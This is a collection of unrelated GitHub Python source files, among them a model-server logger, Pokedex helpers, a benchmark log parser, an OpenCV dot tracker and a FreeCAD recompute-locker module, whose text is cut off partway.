+{"seq_id":"31650444062","text":"#\r\n# Copyright (c) 2018 Intel Corporation\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n#\r\n\r\nimport logging\r\nfrom ie_serving.config import GLOBAL_CONFIG\r\n\r\navailable_lvl_of_logger = ['INFO', 'DEBUG', 'ERROR']\r\n\r\n\r\ndef get_logger_lvl():\r\n requested_lvl = GLOBAL_CONFIG['logging_level']\r\n requested_lvl = requested_lvl.upper()\r\n global LOGGER_LVL\r\n if requested_lvl in available_lvl_of_logger:\r\n return requested_lvl\r\n return 'INFO'\r\n\r\n\r\nLOGGER_LVL = get_logger_lvl()\r\n\r\n\r\ndef get_logger(name):\r\n logger = logging.getLogger(name)\r\n log_formatter = logging.Formatter(\"%(asctime)s - %(name)s - \"\r\n \"%(levelname)s - %(message)s\")\r\n logger.setLevel(LOGGER_LVL)\r\n\r\n console_handler = logging.StreamHandler()\r\n console_handler.setFormatter(log_formatter)\r\n logger.addHandler(console_handler)\r\n\r\n if GLOBAL_CONFIG['log_path'] is not None:\r\n file_handler = logging.FileHandler(GLOBAL_CONFIG['log_path'])\r\n file_handler.setFormatter(log_formatter)\r\n logger.addHandler(file_handler)\r\n\r\n return logger\r\n","repo_name":"puzuwe/openvino-model-server-k8s-terraform","sub_path":"OpenVINO-model-server/ie_serving/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"9252710511","text":"# Chris Davis -- 4/24/16\n# DataFormatClasses -- methods that format various information from database so it is more usable\n\nfrom .models import Pokedex\n\n\ndef formatAbilities(abilityRaw, hidability):\n abilitySplit = abilityRaw.split(\"/\")\n\n try:\n return {\"ability1\": abilitySplit[0], \"ability2\": abilitySplit[1], \"ability3\": hidability}\n except IndexError:\n return {\"ability1\": abilityRaw, \"ability2\": None, \"ability3\": hidability}\n\ndef formatNavButtons(id):\n prevPoke = Pokedex.query.filter_by(id=id-1).first()\n nextPoke = Pokedex.query.filter_by(id=id+1).first()\n\n if prevPoke == None:\n prevPoke = Pokedex.query.filter_by(id=251).first()\n if nextPoke == None:\n nextPoke = Pokedex.query.filter_by(id=1).first()\n\n return {\"prev\": prevPoke.name, \"next\": nextPoke.name}\n\ndef formatEvoButtons(evoLine):\n print(evoLine)\n evoButtons = {}\n\n if evoLine is None:\n return None, False\n\n i = 0\n multiEvoCheck = False\n for e in evoLine.split(\"/\"):\n multiEvo = e.split(\":\")\n if len(multiEvo) > 1:\n multiEvoList = []\n for m in multiEvo:\n multiEvoList.append(m)\n evoButtons.update({\"evo\"+str(i):multiEvoList})\n multiEvoCheck = i\n else:\n evoButtons.update({\"evo\"+str(i):e})\n\n i += 1\n\n print(evoButtons)\n return evoButtons, multiEvoCheck\n\ndef formatMegaEvoButtons(megaEvo):\n if not megaEvo:\n return None\n\n try:\n return {\"evo1\": megaEvo[0].name, \"evo2\": megaEvo[1].name}\n except IndexError:\n return {\"evo1\": megaEvo[0].name}\n except TypeError:\n return {\"evo1\": megaEvo.name}\n\ndef formatMegaEvoEntry(pokemon, mega):\n return {\n \"id\": pokemon.id,\n \"name\": \"Mega \" + mega.name,\n \"species\": pokemon.species,\n \"poketype\": mega.type,\n \"ability\": mega.ability,\n \"evoline\": pokemon.evoline,\n \"mega\": True,\n \"image\": mega.image,\n \"descrip\": pokemon.descrip,\n \"hp\": mega.hp,\n \"attack\": mega.attack,\n \"defense\": mega.defense,\n \"sattack\": mega.sattack,\n \"sdefense\": mega.sdefense,\n \"speed\": mega.speed,\n \"stone\": mega.stone\n }","repo_name":"superfly310/NSDPokedex","sub_path":"app/DataFormatClasses.py","file_name":"DataFormatClasses.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"16737767410","text":"from util import *\nimport pandas as pd\n\n\ndef standardize_time(t):\n if t.endswith(\"ms\"):\n return float(t[:-2]) / 1000\n if t.endswith(\"µs\"):\n return float(t[:-2]) / (1000 * 1000)\n else:\n return float(t[:-1])\n\n\ndef parse_time_memory(tm):\n seconds = float(tm.split()[0])\n memory = float(tm.split()[2]) / 1000000\n return seconds, memory\n\n\ndef clean_data(data):\n merged_data = {}\n all_keys = []\n for d in data:\n for k in d.keys():\n if k not in all_keys:\n all_keys.append(k)\n\n for k in all_keys:\n for d in data:\n if k not in merged_data:\n merged_data[k] = []\n if k in d:\n merged_data[k].append(d[k])\n else:\n merged_data[k].append(\"\")\n return merged_data\n\n\ndef get_log_paths(system):\n assert system == \"circ\" or system == \"hycc\"\n test_results_path = \"{}test_results/\".format(CIRC_BENCHMARK_SOURCE)\n circ_paths = [os.path.join(test_results_path, f) for f in os.listdir(\n test_results_path) if f.startswith(system)]\n log_paths = []\n for p in circ_paths:\n if os.path.isdir(p):\n test_dir_path = p\n log_paths += [os.path.join(test_dir_path, f)\n for f in os.listdir(test_dir_path) if f.startswith(\"log\")]\n else:\n # parsing total time\n pass\n return log_paths\n\n\ndef clean_log(log):\n log = log.replace(\"LOG: \", \"\")\n log = log.replace(\"====================================\", \"\")\n log = \"\\n\".join([l for l in log.split(\n \"\\n\") if not l.startswith(\"Benchmarking\") and l])\n return log\n\n\ndef parse_hycc_log(log):\n log = clean_log(log)\n data = {}\n for line in log.split(\"\\n\"):\n line = line.split(\":\")\n\n line[0] = line[0].strip()\n line[1] = line[1].strip()\n\n if line[0] == \"TEST\":\n data[line[0]] = line[1]\n elif line[0] == \"SELECTION_SCHEME\":\n data[line[0]] = line[1]\n elif line[0] == \"MINIMIZATION_TIME\":\n data[line[0]] = int(line[1])\n elif line[0] == \"ARGUMENTS\":\n data[line[0]] = [l for l in line[1].replace(\n \"['\", \" \").replace(\"']\", \" \").replace(\",\", \" \").split() if l]\n elif line[0] == \"COST_MODEL\":\n data[line[0]] = line[1]\n elif line[0] == \"MODE\":\n if line[0] not in data:\n data[line[0]] = []\n data[line[0]].append(line[1])\n elif line[0] == \"RERUN\":\n if line[0] not in data:\n data[line[0]] = []\n data[line[0]].append(int(line[1]))\n elif line[0] == \"Time / Memory\":\n seconds, memory = parse_time_memory(line[1])\n if \"Total_time\" not in data:\n data[\"Total_time\"] = []\n if \"Total_memory\" not in data:\n data[\"Total_memory\"] = []\n data[\"Total_time\"].append(seconds)\n data[\"Total_memory\"].append(memory)\n elif line[0].endswith(\"time\"):\n data[line[0]] = standardize_time(line[1])\n elif line[0] == \"Total number of gates\":\n data[line[0]] = int(line[1])\n elif line[0] == \"Total depth\":\n data[line[0]] = int(line[1])\n elif \"Timing\" in line[0]:\n key = line[0].split()[1] + \" Time\"\n data[key] = standardize_time(line[1])\n elif line[0] == \"Missing\":\n data[\"MISSING\"] = \"missing\"\n elif \"Error\" in line[0]:\n if \"ERROR\" not in data:\n data[\"ERROR\"] = []\n data[\"ERROR\"].append(\" \".join(line[1:]))\n elif \"Failed\" in line[0]:\n if \"FAIL\" not in data:\n data[\"FAIL\"] = []\n data[\"FAIL\"].append(\" \".join(line[1:]))\n else:\n print(line)\n raise RuntimeError(\"Unknown key\")\n return data\n\n\ndef parse_circ_log(log):\n log = clean_log(log)\n data = {}\n for line in log.split(\"\\n\"):\n line = line.split(\":\")\n assert(len(line) == 2)\n\n line[0] = line[0].strip()\n line[1] = line[1].strip()\n\n if line[0] == \"TEST\":\n data[line[0]] = line[1]\n elif line[0] == \"SELECTION_SCHEME\":\n data[line[0]] = line[1]\n elif line[0] == \"PARTITION_SIZE\":\n data[line[0]] = line[1]\n elif line[0] == \"MUTATION_LEVEL\":\n data[line[0]] = line[1]\n elif line[0] == \"MUTATION_STEP_SIZE\":\n data[line[0]] = line[1]\n elif line[0] == \"GRAPH_TYPE\":\n data[line[0]] = \"KaHIP\" if line[1].strip() == \"0\" else \"KaHyPar\"\n elif line[0] == \"COST_MODEL\":\n data[line[0]] = line[1]\n elif line[0] == \"Number of Partitions\":\n data[\"NUM_PARTS\"] = line[1]\n elif line[0] == \"MODE\":\n continue\n elif line[0] == \"RERUN\":\n if line[0] not in data:\n data[line[0]] = []\n data[line[0]].append(int(line[1]))\n elif line[0] == \"Frontend\":\n data[line[0]] = standardize_time(line[1])\n elif line[0] == \"Optimizations\":\n data[line[0]] = standardize_time(line[1])\n elif \"Assignment\" in line[0]:\n if line[0] == \"Assignment cost of partition\":\n # cost per partition ilp\n if \"assignment_cost\" not in data:\n data[\"assignment_cost\"] = []\n data[\"assignment_cost\"].append(float(line[1]))\n elif line[0] == \"Assignment time\":\n # total solving time \n data[\"assignment_time\"] = standardize_time(line[1])\n else:\n raise RuntimeError(\"Assignment mismatch: {}\".format(line[0]))\n elif line[0] == \"Time / Memory\":\n # requires phase\n seconds, memory = parse_time_memory(line[1])\n if \"Total_time\" not in data:\n data[\"Total_time\"] = []\n if \"Total_memory\" not in data:\n data[\"Total_memory\"] = []\n data[\"Total_time\"].append(seconds)\n data[\"Total_memory\"].append(memory)\n elif line[0] == \"Lowering\":\n data[line[0]] = standardize_time(line[1])\n elif line[0] == \"Compile\":\n data[line[0]] = standardize_time(line[1])\n elif line[0].endswith(\"time\"):\n data[line[0]] = standardize_time(line[1])\n elif line[0] == \"Total number of gates\":\n data[line[0]] = int(line[1])\n elif line[0] == \"Total depth\":\n data[line[0]] = int(line[1])\n elif \"Timing\" in line[0]:\n key = line[0].split()[1] + \" Time\"\n data[key] = standardize_time(line[1])\n else:\n raise RuntimeError(\"Unknown key: {}\".format(line[0]))\n\n return data\n\n\ndef write_csv(df, log_path):\n header = \"{}csvs/\".format(CIRC_BENCHMARK_SOURCE)\n log_path = log_path.split(\"/\")\n dir_path = os.path.join(header, log_path[-2])\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n\n version = log_path[-1].split(\".\")[0]+\".csv\"\n csv_path = os.path.join(dir_path, version)\n print(csv_path)\n df.to_csv(csv_path)\n\ndef clean_data(data):\n merged_data = {}\n all_keys = []\n for d in data:\n for k in d.keys():\n if k not in all_keys:\n all_keys.append(k)\n\n for k in all_keys:\n for d in data:\n if k not in merged_data:\n merged_data[k] = []\n if k in d:\n merged_data[k].append(d[k])\n else:\n merged_data[k].append(\"\")\n return merged_data\n\n\ndef parse_hycc_logs():\n log_paths = get_log_paths(\"hycc\")\n compile_datas = []\n run_datas = []\n for log_path in log_paths:\n data = {}\n with open(log_path, \"r\") as f:\n log = f.read()\n data = parse_hycc_log(log)\n if \"log_compile\" in log_path:\n compile_datas.append(data)\n else:\n run_datas.append(data)\n\n # clean compile data\n compile_data = clean_data(compile_datas)\n\n # write compile data\n compile_path = CIRC_BENCHMARK_SOURCE + \"csvs/hycc/compile_data.txt\"\n write_csv(pd.DataFrame(compile_data), compile_path)\n\n # clean run data\n run_data = clean_data(run_datas)\n\n # clean run_path\n run_path = CIRC_BENCHMARK_SOURCE + \"csvs/hycc/run_data.txt\"\n write_csv(pd.DataFrame(run_data), run_path)\n \n\ndef parse_circ_logs():\n log_paths = get_log_paths(\"circ\")\n compile_datas = []\n run_datas = []\n for log_path in log_paths:\n with open(log_path, \"r\") as f:\n data = {}\n with open(log_path, \"r\") as f:\n log = f.read()\n data = parse_circ_log(log)\n\n if \"log_compile\" in log_path:\n compile_datas.append(data)\n else:\n run_datas.append(data)\n\n # clean compile data\n compile_data = clean_data(compile_datas)\n\n # write compile data\n compile_path = CIRC_BENCHMARK_SOURCE + \"csvs/circ/compile_data.txt\"\n write_csv(pd.DataFrame(compile_data), compile_path)\n\n # clean run data\n run_data = clean_data(run_datas)\n\n # clean run_path\n run_path = CIRC_BENCHMARK_SOURCE + \"csvs/circ/run_data.txt\"\n write_csv(pd.DataFrame(run_data), run_path)\n","repo_name":"edwjchen/circ_benchmarks","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":9269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"36906844031","text":"# number of men with medals: 386\n# number of women with medals: 239\n\nimport matplotlib.pyplot as plt\n\nvalues = [386, 239]\nlabels = [\"Men\", \"Women\"]\ncolors = [\"silver\", \"gold\"]\nexplode = [0, 0.1]\n\nplt.pie(values, labels=labels, colors=colors, explode=explode)\nplt.show()","repo_name":"shirinhk/dataviz","sub_path":"data/piechart.py","file_name":"piechart.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"517505725","text":"import cv2\nimport numpy as np\n\nhue = 0\nsat = 0\nval = 0\n\nhueVar = 0\nsatVar = 0\nvalVar = 0\n\ndef readColorSettings():\n global hue,sat,val,hueVar,satVar,valVar\n import colorSettings\n settings = colorSettings.colorSettings()\n hue,sat,val = settings[\"hue\"],settings[\"sat\"],settings[\"val\"]\n hueVar,satVar,valVar = settings[\"hueVar\"],settings[\"satVar\"],settings[\"valVar\"]\n\ndef writeColorSettings():\n import os\n settingsFile = \"def colorSettings(): \\n return {\"\n settingsFile = settingsFile + f\"'hue':{hue}, \\n 'sat':{sat}, \\n 'val':{val}, \\n 'hueVar':{hueVar}, \\n 'satVar':{satVar}, \\n 'valVar':{valVar}\" + \"}\"\n\n f = open(\"colorSettings.py\",\"w\")\n f.write(settingsFile)\n f.close()\n\nreadColorSettings()\n\ndef extractMass(img,lower=False):\n (contours, hierarchy) = cv2.findContours(img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n areas = []\n\n for j in range(0,len(contours)):\n area = cv2.contourArea(contours[j]);\n moments = cv2.moments(contours[j]);\n if moments[\"m00\"] > 0:\n x = moments[\"m10\"]/moments[\"m00\"]\n y = moments[\"m01\"]/moments[\"m00\"]\n position = (round(x),round(y))\n areas.append({'area':area, 'position':position})\n \n def ar(x):\n return x['area']\n def pos(x):\n return x['position'][1]\n \n areas.sort(key=ar,reverse=True)\n if (lower):\n areas.sort(key=pos,reverse=True)\n\n if len(areas) > 0:\n return areas[0][\"position\"]\n \n return (-100,-100)\n\ndef changeHue(x):\n global hue\n hue = x\n\ndef changeSat(x):\n global sat\n sat = x\n\ndef changeVal(x):\n global val\n val = x\n\ndef changeHueVar(x):\n global hueVar\n hueVar = x\n\ndef changeSatVar(x):\n global satVar\n satVar = x\n\ndef changeValVar(x):\n global valVar\n valVar = x\n\ndef adjustCenterPoint():\n topWebcam = cv2.VideoCapture(2)\n bottomWebcam = cv2.VideoCapture(0)\n cv2.imshow(\"blueDots\",np.zeros((10,10)))\n cv2.createTrackbar('Hue','blueDots',hue,255,changeHue)\n cv2.createTrackbar('Sat','blueDots',sat,255,changeSat)\n cv2.createTrackbar('Val','blueDots',val,255,changeVal)\n cv2.createTrackbar('Hue-Variance','blueDots',hueVar,255,changeHueVar)\n cv2.createTrackbar('Sat-Variance','blueDots',satVar,255,changeSatVar)\n cv2.createTrackbar('Val-Variance','blueDots',valVar,255,changeValVar)\n\n while True:\n isTrue,topFrame = topWebcam.read()\n isTrue,bottomFrame = bottomWebcam.read()\n \n rubbish,heightCenter = findDotCenter(bottomFrame,testing=True,lower=True)\n editedFrame,center = findDotCenter(topFrame,testing=True)\n\n cv2.imshow(\"BottomFrame\",rubbish)\n \n\n print(\"Adjusting:\",center,heightCenter)\n\n key = cv2.waitKey(1)\n if key == ord('q') or key == 27:\n break\n\n writeColorSettings()\n\n topWebcam.release()\n bottomWebcam.release()\n\n cv2.destroyAllWindows()\n\n return center,heightCenter\n\ndef findDotCenter(img,testing=False,lower=False):\n \n # Konvertiere Kamera-Feed in HSV-Format\n imgHSV = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n\n # Extrahiere den gesuchten Punkt aus dem Bild\n blueDots = cv2.inRange(imgHSV, (hue-hueVar,sat-satVar,val-valVar),(hue+hueVar,sat+satVar,val+valVar))\n\n if testing:\n cv2.imshow(\"blueDots\",blueDots)\n \n center = extractMass(blueDots,lower)\n\n # Center an der richtigen Stelle\n cv2.circle(img,center,6,(200,200,0),thickness=-1)\n\n # Generiere überdeckenden Kreis in Hautfarbe\n innerRadius = 7\n outerRadius = 9\n\n mask = np.zeros(img.shape,'uint8')\n mask = cv2.cvtColor(mask,cv2.COLOR_RGB2GRAY)\n cv2.circle(mask,center,outerRadius,255,thickness=-1)\n cv2.circle(mask,center,innerRadius,0,thickness=-1)\n\n skinColor = cv2.mean(img,mask)\n cv2.circle(img,center,int(innerRadius*0.5+outerRadius*0.5),skinColor,-1)\n if testing:\n cv2.imshow(\"Without dot\",img)\n\n return img,center\n\n\nif __name__ == '__main__':\n adjustCenterPoint()\n\n \n \n\n","repo_name":"Nico-Enghardt/PointRecognition","sub_path":"findDot.py","file_name":"findDot.py","file_ext":"py","file_size_in_byte":4000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"15163057396","text":"__title__=\"Lattice Recompute Locker: hack to manual recompute of documents.\"\n__author__ = \"DeepSOIC\"\n__url__ = \"\"\n\nimport FreeCAD as App\n\nfrom lattice2Common import *\nimport lattice2Executer as LE\n\ndef touch(obj):\n '''some bastard object like Fusion ignore calls to touch() method. This shuold work around that problem.'''\n obj.touch()\n if hasattr(obj,\"Proxy\"):\n #fixes mystery crash when touching recomputeLocker when it's locked\n return\n \n # the workaround is to reassign some properties...\n for propname in obj.PropertiesList:\n typ = obj.getTypeIdOfProperty(propname)\n val = getattr(obj,propname)\n if typ == 'App::PropertyLink': \n setattr(obj,propname,val)\n elif typ == 'App::PropertyLinkSub': \n #val is (feature,[\"Edge1\",\"Face2\"])\n setattr(obj,propname,val)\n elif typ == 'App::PropertyLinkList':\n setattr(obj,propname,val)\n #elif typ == 'App::PropertyLinkSubList': #disabled due to FreeCAD bug #2602\n # setattr(obj,propname,val)\n\ndef touchEverything(doc):\n touch_count = 0\n for obj in doc.Objects:\n try:\n touch(obj)\n touch_count += 1\n except:\n App.Console.PrintError('Failed to touch object {objname}\\n'\n .format(objname= obj.Name) )\n if touch_count == 0:\n raise ValueError(\"forceRecompute: failed to touch any object!\")\n\ndef recomputeFeature(featureToRecompute, bUndoable = True):\n doc = featureToRecompute.Document\n if bUndoable:\n doc.openTransaction(\"Recompute \"+featureToRecompute.Name)\n if hasattr(featureToRecompute, 'Recomputing'):\n if featureToRecompute.Recomputing == 'Disabled': #toposeries, paraseries...\n featureToRecompute.Recomputing = 'Recompute Once'\n if hasattr(featureToRecompute, \"recompute\"):\n # new FreeCAD! yay!\n featureToRecompute.recompute()\n elif hasattr(featureToRecompute, \"Proxy\"):\n #Python feature - easy!\n featureToRecompute.Proxy.execute(featureToRecompute)\n else:\n infoMessage(\"RecomputeFeature\",\"Selected feature is a C++ feature. Recomputing them with this command was temporarily disabled, because it is known to break dependencies. The command will be frozen, till a reliable way of recomputing c++ feature gets exposed.\")\n return\n featureToRecompute.purgeTouched()\n for docobj in featureToRecompute.InList:\n touch(docobj)\n if bUndoable:\n doc.commitTransaction()\n\ndef makeRecomputeLocker(name):\n '''makeRecomputeLocker(name): makes a RecomputeLocker document object.'''\n obj = FreeCAD.ActiveDocument.addObject(\"App::FeaturePython\",name)\n LatticeRecomputeLocker(obj)\n if FreeCAD.GuiUp: \n ViewProviderLatticeRecomputeLocker(obj.ViewObject)\n return obj\n\nclass LatticeRecomputeLocker:\n \"The LatticeRecomputeLocker object. Mainly used as a mean to stop FreeCAD's automatic recomputes.\"\n def __init__(self,obj):\n self.Type = \"LatticeRecomputeLocker\"\n \n obj.addProperty(\"App::PropertyLink\",\"LinkToSelf\",\"Lattice RecomputeLocker\",\"Link to self, that breaks the DAG, which causes standard FreeCAD recomputes to fail.\")\n \n obj.addProperty(\"App::PropertyBool\",\"LockRecomputes\",\"Lattice RecomputeLocker\", \"Set to true to disable automatic recomputes in FreeCAD\")\n \n obj.Proxy = self\n \n def onChanged(self, obj, prop): #prop is a string - name of the property\n if prop == \"LockRecomputes\":\n if obj.LockRecomputes:\n obj.LinkToSelf = obj\n else:\n obj.LinkToSelf = None\n \n def execute(self, obj):\n pass\n \n def RecomputeDocument(self, obj, bUndoable = True):\n oldState = obj.LockRecomputes\n obj.LockRecomputes = False\n doc = obj.Document\n if bUndoable:\n doc.openTransaction(\"Recompute document\")\n doc.recompute()\n if bUndoable:\n doc.commitTransaction()\n obj.LockRecomputes = oldState\n \n def collectTouchedDict(self, selfobj):\n doc = selfobj.Document\n dict = {}\n for docobj in doc.Objects:\n dict[docobj.Name] = 'Touched' in docobj.State\n return dict\n \n def restoreTouched(self, selfobj, dict):\n doc = selfobj.Document\n for docobj in doc.Objects:\n if dict[docobj.Name] != ('Touched' in docobj.State):\n if dict[docobj.Name] == True:\n touch(docobj)\n else:\n docobj.purgeTouched()\n \n \nclass ViewProviderLatticeRecomputeLocker:\n \"A View Provider for LatticeRecomputeLocker object\"\n\n def __init__(self,vobj):\n vobj.Proxy = self\n \n def getIcon(self):\n if self.Object.LockRecomputes:\n return getIconPath(\"Lattice2_RecomputeLocker_Locked.svg\")\n else:\n return getIconPath(\"Lattice2_RecomputeLocker_Unlocked.svg\")\n\n def attach(self, vobj):\n self.ViewObject = vobj\n self.Object = vobj.Object\n\n \n def setEdit(self,vobj,mode):\n return False\n \n def unsetEdit(self,vobj,mode):\n return\n\n def __getstate__(self):\n return None\n\n def __setstate__(self,state):\n return None\n\n# --------------------------------/document object------------------------------\n\n\n\n# --------------------------------Gui commands----------------------------------\n\ndef getLocker():\n if hasattr(App.ActiveDocument,\"LatticeRecomputeLocker\"):\n return App.ActiveDocument.LatticeRecomputeLocker\n else:\n return None\n\nclass _CommandMakeLockerObj:\n \"Command to create RecomputeLocker feature\"\n def GetResources(self):\n return {'Pixmap' : getIconPath(\"Lattice2_RecomputeLocker_MakeFeature.svg\"),\n 'MenuText': QtCore.QT_TRANSLATE_NOOP(\"Lattice2_RecomputeLocker\",\"Make recompute locker object\"),\n 'Accel': \"\",\n 'ToolTip': QtCore.QT_TRANSLATE_NOOP(\"Lattice2_RecomputeLocker\",\"Make recompute locker object. Doing this is necessary to enable recompute locking hacktionality.\"),\n 'CmdType':\"ForEdit\"}\n \n def Activated(self):\n if getLocker() is None:\n FreeCADGui.addModule(\"lattice2RecomputeLocker\")\n FreeCADGui.doCommand(\"lattice2RecomputeLocker.makeRecomputeLocker('LatticeRecomputeLocker')\")\n FreeCADGui.doCommand(\"App.ActiveDocument.LatticeRecomputeLocker.purgeTouched()\")\n else:\n mb = QtGui.QMessageBox()\n mb.setIcon(mb.Icon.Warning)\n mb.setText(translate(\"Lattice2_RecomputeLocker\", \"A recompute locker object already exists in this document. Only one such object can be made.\", None))\n mb.setWindowTitle(translate(\"Lattice2_RecomputeLocker\",\"Nothing to do\", None))\n mb.exec_()\n \n def IsActive(self):\n if not App.ActiveDocument: return False\n if hasattr(App.ActiveDocument,'RecomputesFrozen'):\n return False # new FreeCAD, with proper recompute disablement. Disable the hack.\n else:\n return (bool(App.ActiveDocument) and getLocker() is None)\n \nif FreeCAD.GuiUp:\n FreeCADGui.addCommand('Lattice2_RecomputeLocker_MakeFeature', _CommandMakeLockerObj())\n\nclass _CommandLockRecomputes:\n \"Command to lock automatic recomputes\"\n def GetResources(self):\n return {'Pixmap' : getIconPath(\"Lattice2_RecomputeLocker_LockRecomputes.svg\"),\n 'MenuText': QtCore.QT_TRANSLATE_NOOP(\"Lattice2_RecomputeLocker\",\"Lock recomputes\"),\n 'Accel': \"\",\n 'ToolTip': QtCore.QT_TRANSLATE_NOOP(\"Lattice2_RecomputeLocker\",\"Lock recomputes: prevent FreeCAD's automatic recomputes.\"),\n 'CmdType':\"ForEdit\"}\n \n def Activated(self):\n if hasattr(App.ActiveDocument,'RecomputesFrozen'):\n FreeCADGui.doCommand(\"App.ActiveDocument.RecomputesFrozen = True\")\n elif getLocker() is not None:\n FreeCADGui.addModule(\"lattice2RecomputeLocker\")\n FreeCADGui.doCommand(\"lattice2RecomputeLocker.getLocker().LockRecomputes = True\")\n FreeCADGui.doCommand(\"lattice2RecomputeLocker.getLocker().touch()\") #gets rid of the tick, plus updates the icon.\n else:\n mb = QtGui.QMessageBox()\n mb.setIcon(mb.Icon.Warning)\n mb.setText(translate(\"Lattice2_RecomputeLocker\", \"There is no recompute locker object in the document. Please create one, first.\", None))\n mb.setWindowTitle(translate(\"Lattice2_RecomputeLocker\",\"fail\", None))\n mb.exec_()\n \n def IsActive(self):\n if not App.ActiveDocument: return False\n if hasattr(App.ActiveDocument,'RecomputesFrozen'):\n return App.ActiveDocument.RecomputesFrozen == False \n else:\n return getLocker() is not None and not getLocker().LockRecomputes\n \nif FreeCAD.GuiUp:\n FreeCADGui.addCommand('Lattice2_RecomputeLocker_LockRecomputes', _CommandLockRecomputes())\n\nclass _CommandUnlockRecomputes:\n \"Command to unlock automatic recomputes\"\n def GetResources(self):\n return {'Pixmap' : getIconPath(\"Lattice2_RecomputeLocker_UnlockRecomputes.svg\"),\n 'MenuText': QtCore.QT_TRANSLATE_NOOP(\"Lattice2_RecomputeLocker\",\"Unlock recomputes\"),\n 'Accel': \"\",\n 'ToolTip': QtCore.QT_TRANSLATE_NOOP(\"Lattice2_RecomputeLocker\",\"Unlock recomputes: switch on FreeCAD's automatic recomputes.\"),\n 'CmdType':\"ForEdit\"}\n \n def Activated(self):\n if hasattr(App.ActiveDocument,'RecomputesFrozen'):\n FreeCADGui.doCommand(\"App.ActiveDocument.RecomputesFrozen = False\")\n elif getLocker() is not None:\n FreeCADGui.addModule(\"lattice2RecomputeLocker\")\n FreeCADGui.doCommand(\"lattice2RecomputeLocker.getLocker().LockRecomputes = False\")\n FreeCADGui.doCommand(\"lattice2RecomputeLocker.getLocker().purgeTouched()\") #gets rid of the tick, plus updates the icon.\n else:\n mb = QtGui.QMessageBox()\n mb.setIcon(mb.Icon.Warning)\n mb.setText(translate(\"Lattice2_RecomputeLocker\", \"There is no recompute locker object in the document. Please create one, first.\", None))\n mb.setWindowTitle(translate(\"Lattice2_RecomputeLocker\",\"fail\", None))\n mb.exec_()\n \n def IsActive(self):\n if not App.ActiveDocument: return False\n if hasattr(App.ActiveDocument,'RecomputesFrozen'):\n return App.ActiveDocument.RecomputesFrozen == True \n else:\n return getLocker() is not None and getLocker().LockRecomputes\n \nif FreeCAD.GuiUp:\n FreeCADGui.addCommand('Lattice2_RecomputeLocker_UnlockRecomputes', _CommandUnlockRecomputes())\n\nclass _CommandRecomputeFeature:\n \"Command to recompute single object\"\n def GetResources(self):\n return {'Pixmap' : getIconPath(\"Lattice2_RecomputeLocker_RecomputeFeature.svg\"),\n 'MenuText': QtCore.QT_TRANSLATE_NOOP(\"Lattice2_RecomputeLocker\",\"Recompute feature\"),\n 'Accel': \"\",\n 'ToolTip': QtCore.QT_TRANSLATE_NOOP(\"Lattice2_RecomputeLocker\",\"RecomputeFeature: recompute selected objects.\"),\n 'CmdType':\"ForEdit\"}\n \n def Activated(self):\n sel = FreeCADGui.Selection.getSelectionEx()\n FreeCADGui.addModule(\"lattice2RecomputeLocker\")\n for selobj in sel:\n FreeCADGui.doCommand(\"lattice2RecomputeLocker.recomputeFeature(App.ActiveDocument.\"+selobj.ObjectName+\")\")\n \n def IsActive(self):\n return len(FreeCADGui.Selection.getSelectionEx()) > 0\n \nif FreeCAD.GuiUp:\n FreeCADGui.addCommand('Lattice2_RecomputeLocker_RecomputeFeature', _CommandRecomputeFeature())\n\n\nclass _CommandRecomputeDocument:\n \"Command to recompute whole document\"\n def GetResources(self):\n return {'Pixmap' : getIconPath(\"Lattice2_RecomputeLocker_RecomputeDocument.svg\"),\n 'MenuText': QtCore.QT_TRANSLATE_NOOP(\"Lattice2_RecomputeLocker\",\"Recompute document\"),\n 'Accel': \"\",\n 'ToolTip': QtCore.QT_TRANSLATE_NOOP(\"Lattice2_RecomputeLocker\",\"Recompute document: recompute the document, ignoring that recomputes are locked.\"),\n 'CmdType':\"ForEdit\"}\n \n def Activated(self):\n try:\n if hasattr(App.ActiveDocument, 'RecomputesFrozen'):\n FreeCADGui.doCommand(\n '_lock = App.ActiveDocument.RecomputesFrozen\\n'\n 'App.ActiveDocument.RecomputesFrozen = False\\n'\n 'App.ActiveDocument.recompute()\\n'\n 'App.ActiveDocument.RecomputesFrozen = _lock\\n'\n 'del _lock\\n'\n )\n else: #old FC, hacky recompute control\n if getLocker() is not None:\n FreeCADGui.addModule(\"lattice2RecomputeLocker\")\n FreeCADGui.doCommand(\"lattice2RecomputeLocker.getLocker().Proxy.RecomputeDocument(lattice2RecomputeLocker.getLocker())\")\n else:\n FreeCADGui.doCommand(\"App.ActiveDocument.recompute()\")\n except Exception as err:\n msgError(err)\n \n def IsActive(self):\n return App.ActiveDocument is not None\n \nif FreeCAD.GuiUp:\n FreeCADGui.addCommand('Lattice2_RecomputeLocker_RecomputeDocument', _CommandRecomputeDocument())\n\nclass _CommandForceRecompute:\n \"Command to force recompute of every feature\"\n def GetResources(self):\n return {'Pixmap' : getIconPath(\"Lattice2_RecomputeLocker_ForceRecompute.svg\"),\n 'MenuText': QtCore.QT_TRANSLATE_NOOP(\"Lattice2_RecomputeLocker\",\"Force recompute\"),\n 'Accel': \"Shift+F5\",\n 'ToolTip': QtCore.QT_TRANSLATE_NOOP(\"Lattice2_RecomputeLocker\",\"Force recompute: recompute all features in the document.\"),\n 